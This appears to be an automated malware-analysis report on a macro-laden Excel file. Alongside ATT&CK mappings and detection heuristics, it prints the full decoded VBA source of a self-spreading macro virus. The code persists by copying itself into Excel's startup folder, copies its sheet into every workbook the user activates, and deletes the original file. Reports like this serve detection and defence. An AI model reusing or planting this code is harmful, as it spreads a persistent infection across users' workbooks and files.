MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel file containing VBA macros, specifically an Auto_Open macro designed to save a copy of itself to the Excel startup directory as 'mypersonnel.xls'. This action establishes persistence by ensuring the malicious macro executes every time Excel is opened. The Auto_Close macro attempts to convert the file to an older XLS format and delete the original XLSX, likely to evade detection or ensure compatibility with older systems.
Heuristics 6
-
ClamAV: Xls.Malware.ExcelSic-10004731-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.ExcelSic-10004731-1
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
External relationship medium OOXML_EXTERNAL_RELExternal target in xl/drawings/_rels/drawing48.xml.rels: cid:image011.gif@01D0F513.C5945200
-
Hidden worksheet (veryHidden, hidden) low OOXML_HIDDEN_SHEETExcel workbook contains 48 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1510 bytes |
SHA-256: d49b3eed57ea333340314eacd5bf3454f6a2ba3085f3bfa723034dd1a2d97cfb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kangatang"
Sub Auto_Open()
Application.EnableCancelKey = xlDisabled
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then Exit Sub
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), _
FileFormat:=xlExcel8, Password:="", WriteResPassword:="", _
ReadOnlyRecommended:=False, CreateBackup:=False
Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx")
End Sub
Sub allocated()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 9216 bytes |
SHA-256: 43409d5281b2142658d78bc25993b4680967547d399ef58e1fc18239f8b4e7ce |
|||
|
Detection
ClamAV:
Xls.Malware.ExcelSic-10004731-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.